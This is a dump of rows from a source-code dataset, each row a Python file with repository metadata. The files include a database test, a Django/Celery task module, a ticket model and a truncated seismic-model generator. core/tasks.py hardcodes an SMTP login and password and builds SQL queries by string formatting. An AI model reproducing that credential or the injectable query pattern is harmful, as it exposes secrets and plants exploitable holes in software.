| 21.833333 | 66 | 0.735369 | 49 | 393 | 5.55102 | 0.653061 | 0.066176 | 0.132353 | 0.154412 | 0.198529 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003077 | 0.173028 | 393 | 17 | 67 | 23.117647 | 0.833846 | 0.043257 | 0 | 0 | 0 | 0 | 0.104 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afaf8c33f53139fdc1d77c79ac987609220c6432 | 2,150 | py | Python | venv/Lib/site-packages/tests/test_312_CacheBoundParameters.py | shehzadulislam/Assignment4 | a9cced70be6ae5d2685027d68032d5849f638301 | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/tests/test_312_CacheBoundParameters.py | shehzadulislam/Assignment4 | a9cced70be6ae5d2685027d68032d5849f638301 | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/tests/test_312_CacheBoundParameters.py | shehzadulislam/Assignment4 | a9cced70be6ae5d2685027d68032d5849f638301 | [
"Apache-2.0"
] | null | null | null | #
# Licensed Materials - Property of IBM
#
# (c) Copyright IBM Corp. 2016
#
import unittest, sys
import ibm_db
import config
from testfunctions import IbmDbTestFunctions
class Wrapper(str):
def __del__(self):
print("Wrapper(" + self + ") being deleted")
class IbmDbTestCase(unittest.TestCase):
def test_312_CacheBoundParameters(self):
obj = IbmDbTestFunctions()
obj.assert_expect(self.run_test_312)
def run_test_312(self):
conn = ibm_db.connect(config.database, config.user, config.password)
ibm_db.autocommit(conn, ibm_db.SQL_AUTOCOMMIT_OFF)
query = "INSERT INTO department (deptno, deptname, mgrno, admrdept, location) VALUES (?, ?, ?, ?, ?)"
if conn:
stmt = ibm_db.prepare(conn, query)
params = ['STG', 'Systems & Technology', '123456', 'RSF', 'Fiji']
print("Binding parameters")
for i,p in enumerate(params, 1):
ibm_db.bind_param(stmt, i, Wrapper(p))
if ibm_db.execute(stmt):
print("Executing statement")
ibm_db.execute(stmt)
# force the cache to be unbound
for i,p in enumerate(params, 1):
ibm_db.bind_param(stmt, i, p)
ibm_db.rollback(conn)
else:
print("Connection failed.")
#__END__
#__LUW_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
#__ZOS_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
#__SYSTEMI_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
#__IDS_EXPECTED__
#Binding parameters
#Executing statement
#Wrapper(STG) being deleted
#Wrapper(Systems & Technology) being deleted
#Wrapper(123456) being deleted
#Wrapper(RSF) being deleted
#Wrapper(Fiji) being deleted
| 25.903614 | 105 | 0.716279 | 267 | 2,150 | 5.58427 | 0.344569 | 0.169014 | 0.20389 | 0.091214 | 0.515091 | 0.515091 | 0.515091 | 0.515091 | 0.515091 | 0.515091 | 0 | 0.025496 | 0.17907 | 2,150 | 82 | 106 | 26.219512 | 0.819263 | 0.429302 | 0 | 0.068966 | 0 | 0 | 0.17285 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.103448 | false | 0.034483 | 0.137931 | 0 | 0.310345 | 0.137931 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afb70e64470f695604ab08c23db3df1fce35c61f | 4,176 | py | Python | core/tasks.py | mark-barrett/RESTBroker | d9b0a3574d2970443fdf40c70ab9ceb8d72614f4 | [
"MIT"
] | null | null | null | core/tasks.py | mark-barrett/RESTBroker | d9b0a3574d2970443fdf40c70ab9ceb8d72614f4 | [
"MIT"
] | null | null | null | core/tasks.py | mark-barrett/RESTBroker | d9b0a3574d2970443fdf40c70ab9ceb8d72614f4 | [
"MIT"
] | null | null | null | # Developed by Mark Barrett
# http://markbarrettdesign.com
# https://github.com/mark-barrett
from __future__ import absolute_import, unicode_literals
import os
import django
from celery import Celery
from django.core.mail import get_connection, send_mail
from django.template import loader
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'RESTBroker.settings')
django.setup()
app = Celery('tasks', broker='pyamqp://guest@localhost//', backend='rpc://guest@localhost//',)
from sshtunnel import SSHTunnelForwarder
from django.http import HttpResponse
from datetime import datetime
import MySQLdb as db
import dicttoxml
import base64
import redis
import json
from core.models import *
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
@app.task(name='send_email')
def send_email(to, subject, body):
# Establish a connection
connection = get_connection(
host='mail.privateemail.com',
port=587,
username='hi@lapis.works',
password='yE1UpesF',
use_tls=True
)
# Open the template and pass the body into it
email_obj = loader.render_to_string('email/main.html', {'body': body})
# Send it
send_mail(subject,
subject,
'hi@lapis.works',
[to],
fail_silently=True,
html_message=email_obj,
connection=connection)
# Close the connection
connection.close()
@app.task(name='build_database')
def build_database(project_id, server_address,
database_name, database_user, database_password):
# Try connect to the database by its name to check if it exists.
try:
conn = db.connect(host=server_address, port=3306,
user=database_user, password=database_password,
database=database_name)
# If all good close the connection
conn.close()
# Now try to actually build the database
try:
conn = db.connect(host=server_address, port=3306,
user=database_user, password=database_password,
database='information_schema')
project = Project.objects.get(id=project_id)
# Now that we know we can connect, let's construct a database object
database = Database(
server_address=server_address,
name=database_name,
user=database_user,
password=database_password,
project=project
)
print("Hello World")
database.save()
cursor = conn.cursor()
cursor2 = conn.cursor()
# Get all of the tables in that database
cursor.execute("SELECT * FROM information_schema.tables WHERE table_schema='%s'" % database_name)
for row in cursor:
database_table = DatabaseTable(
name=row[2],
database=database
)
database_table.save()
query = "SELECT * FROM information_schema.columns WHERE table_name='{0}' AND table_schema='{1}'".format(
row[2], database_name)
# For each row, get the columns in that table
cursor2.execute(query)
for inner_row in cursor2:
database_column = DatabaseColumn(
name=inner_row[3],
type=inner_row[7],
table=database_table
)
database_column.save()
# Set the "database built" in the project ot true.
project.database_built = True
project.save()
# Close all the stuff
cursor.close()
cursor2.close()
conn.close()
return 'Built Database'
except Exception as e:
return str(e)
except Exception as e:
return str(e) | 28.60274 | 120 | 0.587644 | 462 | 4,176 | 5.160173 | 0.359307 | 0.027265 | 0.021812 | 0.030201 | 0.114933 | 0.114933 | 0.098154 | 0.074664 | 0.074664 | 0.074664 | 0 | 0.008945 | 0.330699 | 4,176 | 146 | 121 | 28.60274 | 0.844007 | 0.128352 | 0 | 0.12766 | 0 | 0 | 0.115586 | 0.039448 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031915 | false | 0.053191 | 0.159574 | 0 | 0.234043 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
afb72313350393f8a23c317a77df8ed5c429197d | 1,880 | py | Python | python_utility/spreadsheet/spreadsheet_service.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | python_utility/spreadsheet/spreadsheet_service.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | python_utility/spreadsheet/spreadsheet_service.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | import cherrypy
from gspread import CellNotFound
from python_utility.spreadsheet.simple_spreadsheet import SimpleSpreadsheet
class SpreadsheetService:
@staticmethod
def read_status() -> str:
try:
from python_utility.build import Build
except ImportError:
# TODO: Understand the best practice.
from python_utility.build_undefined import Build # type: ignore
return 'Version: ' + Build.GIT_TAG + '\n' \
+ 'Git hash: ' + Build.GIT_HASH + '\n' \
+ 'Build date: ' + Build.BUILD_DATE + '\n'
@cherrypy.expose
def index(self):
cherrypy.response.headers['Content-Type'] = 'text/plain'
return 'Hello friend.\n'
@cherrypy.expose
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
def spreadsheet(self):
request = cherrypy.request.json
if 'search' not in request:
response = 'search missing'
elif 'replace' not in request:
response = 'replace missing'
elif 'x-offset' not in request:
response = 'x-offset missing'
else:
search = request['search']
replace = request['replace']
x_offset = request['x-offset']
spreadsheet = SimpleSpreadsheet()
spreadsheet.connect()
try:
cell = spreadsheet.search(search)
spreadsheet.edit_coordinates(
cell.row,
cell.col + int(x_offset),
replace
)
response = 'Success'
except CellNotFound as e:
response = 'Not found: ' + str(e)
return response
@cherrypy.expose
def status(self):
cherrypy.response.headers['Content-Type'] = 'text/plain'
return SpreadsheetService.read_status()
| 29.84127 | 76 | 0.567553 | 182 | 1,880 | 5.78022 | 0.39011 | 0.03327 | 0.048479 | 0.057034 | 0.10076 | 0.10076 | 0.10076 | 0.10076 | 0.10076 | 0 | 0 | 0 | 0.339362 | 1,880 | 62 | 77 | 30.322581 | 0.847021 | 0.025532 | 0 | 0.142857 | 0 | 0 | 0.109896 | 0 | 0 | 0 | 0 | 0.016129 | 0 | 1 | 0.081633 | false | 0 | 0.122449 | 0 | 0.306122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afb9b755dae183e4752a4214a72d422d99f88be0 | 2,774 | py | Python | ui/game/frame_libraries.py | RCIX/RogueP | a3522dae65e90c16986c6254254682789e010f9f | [
"MIT"
] | 2 | 2015-09-07T10:35:12.000Z | 2015-09-12T05:55:29.000Z | ui/game/frame_libraries.py | RCIX/RogueP | a3522dae65e90c16986c6254254682789e010f9f | [
"MIT"
] | null | null | null | ui/game/frame_libraries.py | RCIX/RogueP | a3522dae65e90c16986c6254254682789e010f9f | [
"MIT"
] | null | null | null | # added specifically to make floating point division apply to code in bar position calculation
from __future__ import division
import libtcodpy as libtcod
import xp_loader
import gzip
from vec2d import Vec2d
from model.attribute import AttributeTag
from ui.frame import Frame
from ui.ui_event import UIEvent, UIEventType
# Displays remaining and queued actions.
class FrameLibraries(Frame):
def __init__(self, root_console_width, root_console_height, frame_manager):
self.entity_manager = frame_manager.parent_menu.entity_manager
# load xp for bg
console_bg_xp = gzip.open('assets\\ui\\ui_frame_libraries_bg.xp')
self.bg_data = xp_loader.load_xp_string(console_bg_xp.read())
Frame.__init__(self, root_console_width, root_console_height, self.bg_data['width'], self.bg_data['height'], frame_manager)
library_start_xy = xp_loader.get_position_key_xy(self.bg_data['layer_data'][1], xp_loader.poskey_color_red)
self.library_start_xy = Vec2d(library_start_xy[0], library_start_xy[1])
self.library_line_extent = xp_loader.get_position_key_xy(self.bg_data['layer_data'][1], xp_loader.poskey_color_green)
#TODO put these in config somewhere
self.line_char = chr(196)
self.line_bg = libtcod.Color(2, 22, 12)
self.line_fg = libtcod.Color(6, 130, 60)
self.libname_fg = libtcod.Color(102, 255, 178)
libtcod.console_set_default_background(self.console,self.line_bg)
libtcod.console_set_default_foreground(self.console,self.libname_fg)
libtcod.console_set_alignment(self.console, libtcod.LEFT)
xp_loader.load_layer_to_console(self.console, self.bg_data['layer_data'][0])
def handle_ui_event(self, event):
pass
def draw(self):
libtcod.console_clear(self.console)
xp_loader.load_layer_to_console(self.console, self.bg_data['layer_data'][0])
player_libraries = self.entity_manager.get_entity_by_id(self.entity_manager.player_id).get_attribute(AttributeTag.Libraries).data['value']
for lib in range(4):
#+1 here because range will go up to but not including the final screen tile needed
for x in range(self.library_line_extent[0] - self.library_start_xy[0] + 1):
libtcod.console_put_char_ex(self.console, self.library_start_xy[0] + x, self.library_start_xy[1] + lib, self.line_char, self.line_fg, self.line_bg)
libname_xy = Vec2d(self.library_start_xy[0], self.library_start_xy[1] + lib)
#TODO: move to config strings
libname = 'lib_missing'
print_color = self.line_fg
if len(player_libraries) > lib:
print_color = self.libname_fg
libname = player_libraries[lib].name
libtcod.console_set_default_foreground(self.console, print_color)
libtcod.console_print(self.console, libname_xy[0], libname_xy[1], libname)
libtcod.console_blit(self.console, 0, 0, self.width, self.height, 0, 0, 0) | 40.202899 | 151 | 0.783706 | 444 | 2,774 | 4.581081 | 0.295045 | 0.054081 | 0.061947 | 0.053097 | 0.252704 | 0.224189 | 0.202557 | 0.158309 | 0.117994 | 0.117994 | 0 | 0.019951 | 0.114636 | 2,774 | 69 | 152 | 40.202899 | 0.808225 | 0.104903 | 0 | 0.046512 | 0 | 0 | 0.041583 | 0.014534 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.069767 | false | 0.023256 | 0.186047 | 0 | 0.27907 | 0.093023 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afbb04f2d4284cedd9e1ff7745fd2a724ccbc326 | 8,490 | py | Python | ticket/models/ticket.py | ifbhack/ticketsystem | f2732fe5665dd5e05ecc957446cd883c9c8d63e2 | [
"MIT"
] | null | null | null | ticket/models/ticket.py | ifbhack/ticketsystem | f2732fe5665dd5e05ecc957446cd883c9c8d63e2 | [
"MIT"
] | null | null | null | ticket/models/ticket.py | ifbhack/ticketsystem | f2732fe5665dd5e05ecc957446cd883c9c8d63e2 | [
"MIT"
] | null | null | null | import sqlite3
from typing import List, Iterable, Any
from ticket.models.user import User
# TODO: when we have a couple more errors, put in seperate file
class UserAssignViolationError(Exception):
pass
class TicketNotFoundError(Exception):
pass
class Ticket:
ticket_id: int= 0
user_id: int = 0
title: str = ""
description: str = ""
is_closed: bool = False
tag: str = ""
assigned_user_id: int = 0
created_on: str = ""
def __init__(self, ticket_id: int, user_id: int, title: str,
description: str, created_on: str,
is_closed: bool,
tag: str = "", assigned_user_id: int = 0):
self.ticket_id = ticket_id
self.user_id = user_id
self.title = title
self.description = description
self.assigned_user_id = assigned_user_id
self.tag = tag
self.is_closed = is_closed
self.created_on = created_on
class TicketModel:
# TODO: add sqlite error handling
_db_conn: sqlite3.Connection
def __init__(self, db_conn: sqlite3.Connection):
self._db_conn = db_conn
def open_ticket(self, user_id: int, title: str, description: str, tag: str = "") -> Ticket:
"""open_ticket for a specified user. A ticket is open by default and the datetime is
automatically set within the database.
returns a ticket with the given data and ticket id.
"""
if user_id == 0:
raise ValueError(f"user_id is invalid: got {user_id}")
if title == "" or description == "":
raise ValueError(f"""title or description is an empty string: title:
({title}) description: ({description})""")
cursor = self._db_conn.cursor()
# NOTE(joshturge): Since I'm running sqlite 3.34.* I don't have access to the
# RETURNING functionality, and will need to make a seperate query to the database.
#
# TODO: in the future utilise RETURNING (https://www.sqlite.org/lang_returning.html)
# to return the creation date of the ticket.
cursor.execute("""
INSERT INTO
ticket (user_id, ticket_title, ticket_description, ticket_tag, is_closed)
VALUES (?, ?, ?, ?, 0)
""", (user_id, title, description, tag))
self._db_conn.commit()
# get the ticket_created_on datetime
cursor.execute("""
SELECT
ticket_created_on
FROM ticket
WHERE ticket_id = ?
""", (cursor.lastrowid,))
created_on = cursor.fetchone()
return Ticket(cursor.lastrowid, user_id, title, description, created_on=created_on,
is_closed=False, tag=tag)
def __convert_ticket_row(self, row: List[Any]) -> Ticket:
return Ticket(row[0], row[1], row[3], row[4], row[7], row[6], row[5], row[2])
def get_ticket(self, ticket_id: int) -> Ticket:
"""get_ticket with a given ticket_id. If no ticket is found, a TicketNotFoundError
exception will be raised"""
if ticket_id == 0:
raise ValueError(f"ticket_id is invalid: got {ticket_id}")
cursor = self._db_conn.cursor()
cursor.execute("""
SELECT
*
FROM ticket
WHERE ticket_id = ?
""", (ticket_id,))
row = cursor.fetchone()
if row == None:
raise TicketNotFoundError(f"ticket with ticket_id: {ticket_id} not found")
return self.__convert_ticket_row(row)
def __get_tickets(self, sqlquery: str, parameters: Iterable[Any],
limit: int = 0, offset: int = 0) -> List[Ticket]:
"""get_tickets from the database, given an sqlquery. Sets the limit and offset automatically.
All tickets returned by default with no offset
returns an iterable list of tickets or a TicketNotFoundError when no tickets are found.
"""
if limit != 0:
sqlquery += " LIMIT " + str(limit)
if offset != 0:
sqlquery += " ORDER BY " + str(offset)
cursor = self._db_conn.cursor()
cursor.execute(sqlquery, parameters)
tickets: List[Ticket] = []
rows = cursor.fetchall()
if len(rows) == 0:
raise TicketNotFoundError("no tickets were found")
for row in rows:
tickets.append(self.__convert_ticket_row(row))
return tickets
def get_tickets(self, limit: int = 0, offset: int = 0) -> List[Ticket]:
"""get_tickets from the database
All tickets returned by default with no offset
returns an iterable list of tickets or a TicketNotFoundError when no tickets are found.
"""
return self.__get_tickets("SELECT * FROM ticket", (), limit, offset)
# TODO: change to get tickets via username instead of user_id
def get_tickets_by_user(self, user_id: int, limit: int = 0, offset: int = 0) -> List[Ticket]:
"""get_tickets_by_user from the database given a user_id.
All tickets returned by default with no offset
returns an iterable list of tickets or a TicketNotFoundError when no tickets are found.
"""
if user_id == 0:
raise ValueError(f"invalid user_id: got {user_id}")
return self.__get_tickets("SELECT * FROM ticket WHERE user_id = ?",
(user_id,), limit, offset)
def get_tickets_by_title(self, title: str, limit: int = 0, offset: int = 0) -> List[Ticket]:
"""get_tickets_by_title from the database given a title. Text is matched via a pattern
and does not need to be exact.
All tickets returned by default with no offset
returns an iterable list of tickets or a TicketNotFoundError when no tickets are found.
"""
return self.__get_tickets("SELECT * FROM ticket WHERE ticket_title LIKE ?",
('%'+title+'%',), limit, offset)
def get_tickets_by_tag(self, tag: str, limit: int = 0, offset: int = 0) -> List[Ticket]:
"""get_tickets_by_tag from the database given a tag. Text is matched via a pattern
and does not need to be exact.
All tickets returned by default with no offset
returns an iterable list of tickets or a TicketNotFoundError when no tickets are found.
"""
return self.__get_tickets("SELECT * FROM ticket WHERE ticket_tag LIKE ?",
('%'+tag+'%',), limit, offset)
def get_tickets_by_status(self, is_closed: bool,
limit: int = 0, offset: int = 0) -> List[Ticket]:
"""get_tickets_by_status from the database given a status.
All tickets returned by default with no offset
returns an iterable list of tickets or a TicketNotFoundError when no tickets are found.
"""
return self.__get_tickets("SELECT * FROM ticket WHERE is_closed = ?",
(is_closed,), limit, offset)
def assign_user(self, ticket_id: int, user_id: int):
"""assign_user to a specified ticket"""
if ticket_id == 0:
raise ValueError(f"ticket.ticket_id is invalid: got {ticket_id}")
elif user_id == 0:
raise ValueError(f"user_id is invalid: got {user_id}")
self._db_conn.execute("""
UPDATE ticket
SET assigned_user_id = ?
WHERE
ticket_id = ?
""", (user_id, ticket_id))
self._db_conn.commit()
def add_tag(self, ticket_id: int, tag: str):
"""add_tag or replace tag for a given ticket"""
if ticket_id == 0:
raise ValueError(f"ticket.ticket_id is invalid: got {ticket_id}")
if tag == "":
raise ValueError(f"tag is invalid: got empty string")
self._db_conn.execute("""
UPDATE ticket
SET ticket_tag = ?
WHERE
ticket_id = ?
""", (tag, ticket_id))
self._db_conn.commit()
def close_ticket(self, ticket_id: int):
"""close_ticket given a valid ticket to close"""
if ticket_id == 0:
raise ValueError(f"ticket.ticket_id is invalid: got {ticket_id}")
self._db_conn.execute("""
UPDATE ticket
SET is_closed = 1
WHERE
ticket_id = ?
""", (ticket_id,))
self._db_conn.commit()
| 35.375 | 101 | 0.595289 | 1,083 | 8,490 | 4.486611 | 0.151431 | 0.054332 | 0.024696 | 0.025931 | 0.491665 | 0.433011 | 0.416958 | 0.338753 | 0.310352 | 0.310352 | 0 | 0.007181 | 0.311072 | 8,490 | 239 | 102 | 35.523013 | 0.82356 | 0.25265 | 0 | 0.330882 | 0 | 0 | 0.234134 | 0 | 0 | 0 | 0 | 0.012552 | 0 | 1 | 0.102941 | false | 0.014706 | 0.022059 | 0.007353 | 0.286765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afca1db73f5dd21162208565c2d96e8c65eb7797 | 302 | py | Python | safeness/glad/logger.py | pasmod/obfuscation-pan2016 | 410a3bb1e6827e256b0de1927e185f7e213417bf | [
"MIT"
] | 2 | 2016-10-04T15:35:27.000Z | 2017-12-29T00:42:30.000Z | safeness/glad/logger.py | pasmod/obfuscation-pan2016 | 410a3bb1e6827e256b0de1927e185f7e213417bf | [
"MIT"
] | null | null | null | safeness/glad/logger.py | pasmod/obfuscation-pan2016 | 410a3bb1e6827e256b0de1927e185f7e213417bf | [
"MIT"
] | null | null | null | import logging
def setup_logging(level):
"""
:param level: logging.INFO or logging.DEBUG, etc.
"""
logging.basicConfig(level=level, format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
return logging.getLogger(__name__)
# get logger
log = setup_logging(logging.DEBUG)
| 21.571429 | 99 | 0.675497 | 38 | 302 | 5.210526 | 0.578947 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172185 | 302 | 13 | 100 | 23.230769 | 0.792 | 0.201987 | 0 | 0 | 0 | 0 | 0.231111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
afd2d13f2d1a9355e7d128182b7544c5883c7157 | 738 | py | Python | python/p043.py | lbreede/project-euler | c225e3742f749fc681034aac98cc9c23f8cdb37e | [
"MIT"
] | null | null | null | python/p043.py | lbreede/project-euler | c225e3742f749fc681034aac98cc9c23f8cdb37e | [
"MIT"
] | null | null | null | python/p043.py | lbreede/project-euler | c225e3742f749fc681034aac98cc9c23f8cdb37e | [
"MIT"
] | null | null | null | # Sub-string divisibility
from itertools import permutations
def sub_string(num, start, rng):
start -= 1
end = start + rng
# strnum = str(num)
return int(num[start:end])
def check_properties(num):
p1 = sub_string(num, 2, 3) % 2 == 0
p2 = sub_string(num, 3, 3) % 3 == 0
p3 = sub_string(num, 4, 3) % 5 == 0
p4 = sub_string(num, 5, 3) % 7 == 0
p5 = sub_string(num, 6, 3) % 11 == 0
p6 = sub_string(num, 7, 3) % 13 == 0
p7 = sub_string(num, 8, 3) % 17 == 0
return [p1, p2, p3, p4, p5, p6, p7]
nums = "1234567890"
permutations = list(permutations(nums))
permutations = [''.join(permutation) for permutation in permutations]
result = 0
for p in permutations:
if all(check_properties(p)):
result += int(p)
print(result) | 23.0625 | 69 | 0.639566 | 123 | 738 | 3.756098 | 0.398374 | 0.175325 | 0.207792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096939 | 0.203252 | 738 | 32 | 70 | 23.0625 | 0.688776 | 0.055556 | 0 | 0 | 0 | 0 | 0.014388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.045455 | 0 | 0.227273 | 0.045455 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb622b8ab8684bdbfde028be9a16fbda5516343e | 20,738 | py | Python | vrmslearn/ModelGenerator.py | GeoCode-polymtl/Deep_1D_velocity | 8f42fc4f5c984d0e11b4c93ae7eee99ba3843b4c | [
"MIT"
] | 7 | 2020-08-17T19:47:21.000Z | 2022-03-29T08:02:51.000Z | vrmslearn/ModelGenerator.py | GeoCode-polymtl/Deep_1D_velocity | 8f42fc4f5c984d0e11b4c93ae7eee99ba3843b4c | [
"MIT"
] | 6 | 2020-01-28T22:17:17.000Z | 2022-02-09T23:31:59.000Z | vrmslearn/ModelGenerator.py | GeoCode-polymtl/Deep_1D_velocity | 8f42fc4f5c984d0e11b4c93ae7eee99ba3843b4c | [
"MIT"
] | 4 | 2019-11-27T06:05:31.000Z | 2021-10-08T00:38:38.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Class to generate seismic models and labels for training.
"""
import numpy as np
import copy
from scipy.signal import gaussian
from scipy.interpolate import interp1d
import argparse
from vrmslearn.ModelParameters import ModelParameters
class ModelGenerator(object):
"""
Generate a seismic model with the generate_model method and output the
labels, with generate_labels. As of now, this class generates a 1D layered
model, and the labels correspond to the rms velocity.
"""
def __init__(self, model_parameters=ModelParameters()):
"""
This is the constructor for the class.
@params:
model_parameters (ModelParameters) : A ModelParameter object
@returns:
"""
self.pars = model_parameters
self.vp =None
def generate_model(self):
"""
Output the media parameters required for seismic modelling, in this case
vp, vs and rho. To create 1D model, set pars.flat to True. For 2D dipping
layer models, set it to False.
@params:
@returns:
vp (numpy.ndarray) : numpy array (self.pars.NZ, self.pars.NX) for vp.
vs (numpy.ndarray) : numpy array (self.pars.NZ, self.pars.NX) for vs.
rho (numpy.ndarray) : numpy array (self.pars.NZ, self.pars.NX) for rho
values.
"""
if self.pars.flat:
vp, vs, rho = generate_random_1Dlayered(self.pars)
else:
vp, vs, rho, _, _, _ = generate_random_2Dlayered(self.pars)
self.vp = copy.copy(vp)
return vp, vs, rho
def generate_labels(self):
"""
Output the labels attached to modelling of a particular dataset. In this
case, we want to predict vrms from a cmp gather.
@params:
@returns:
vrms (numpy.ndarray) : numpy array of shape (self.pars.NT, ) with vrms
values in meters/sec.
valid (numpy.ndarray) : numpy array of shape (self.pars.NT, ) with 1
before the last reflection, 0 afterwards
refs (numpy.ndarray) : Two way travel-times of the reflections
"""
vp = self.vp[:, 0]
vrms = calculate_vrms(vp,
self.pars.dh,
self.pars.Npad,
self.pars.NT,
self.pars.dt,
self.pars.tdelay,
self.pars.source_depth)
refs = generate_reflections_ttime(vp, self.pars)
# Normalize so the labels are between 0 and 1
vrms = (vrms - self.pars.vp_min) / (self.pars.vp_max - self.pars.vp_min)
indt = np.argwhere(refs > 0.1).flatten()[-1]
valid = np.ones(len(vrms))
valid[indt:] = 0
return vrms, valid, refs
def calculate_vrms(vp, dh, Npad, NT, dt, tdelay, source_depth):
"""
This method inputs vp and outputs the vrms. The global parameters in
common.py are used for defining the depth spacing, source and receiver
depth etc. This method assumes that source and receiver depths are same.
The convention used is that the velocity denoted by the interval
(i, i+1) grid points is given by the constant vp[i+1].
@params:
vp (numpy.ndarray) : 1D vp values in meters/sec.
dh (float) : the spatial grid size
Npad (int) : Number of absorbing padding grid points over the source
NT (int) : Number of time steps of output
dt (float) : Time step of the output
tdelay (float): Time before source peak
source_depth (float) The source depth in meters
@returns:
vrms (numpy.ndarray) : numpy array of shape (NT, ) with vrms
values in meters/sec.
"""
NZ = vp.shape[0]
# Create a numpy array of depths corresponding to the vp grid locations
depth = np.zeros((NZ,))
for i in range(NZ):
depth[i] = i * dh
# Create a list of tuples of (relative depths, velocity) of the layers
# following the depth of the source / receiver depths, till the last layer
# before the padding zone at the bottom
last_depth = dh * (NZ - Npad - 1)
rdepth_vel_pairs = [(d - source_depth, vp[i]) for i, d in enumerate(depth)
if d > source_depth and d <= last_depth]
first_layer_vel = rdepth_vel_pairs[0][1]
rdepth_vel_pairs.insert(0, (0.0, first_layer_vel))
# Calculate a list of two-way travel times
t = [2.0 * (rdepth_vel_pairs[index][0] - rdepth_vel_pairs[index - 1][
0]) / vel
for index, (_, vel) in enumerate(rdepth_vel_pairs) if index > 0]
t.insert(0, 0.0)
total_time = 0.0
for i, time in enumerate(t):
total_time += time
t[i] = total_time
# The last time must be 'dt' * 'NT', so adjust the lists 'rdepth_vel_pairs'
# and 't' by cropping and adjusting the last sample accordingly
rdepth_vel_pairs = [(rdepth_vel_pairs[i][0], rdepth_vel_pairs[i][1]) for
i, time in enumerate(t)
if time <= NT * dt]
t = [time for time in t if time <= NT * dt]
last_index = len(t) - 1
extra_distance = (NT * dt - t[last_index]) * rdepth_vel_pairs[last_index][
1] / 2.0
rdepth_vel_pairs[last_index] = (
extra_distance + rdepth_vel_pairs[last_index][0],
rdepth_vel_pairs[last_index][1])
t[last_index] = NT * dt
# Compute vrms at the times in t
vrms = [first_layer_vel]
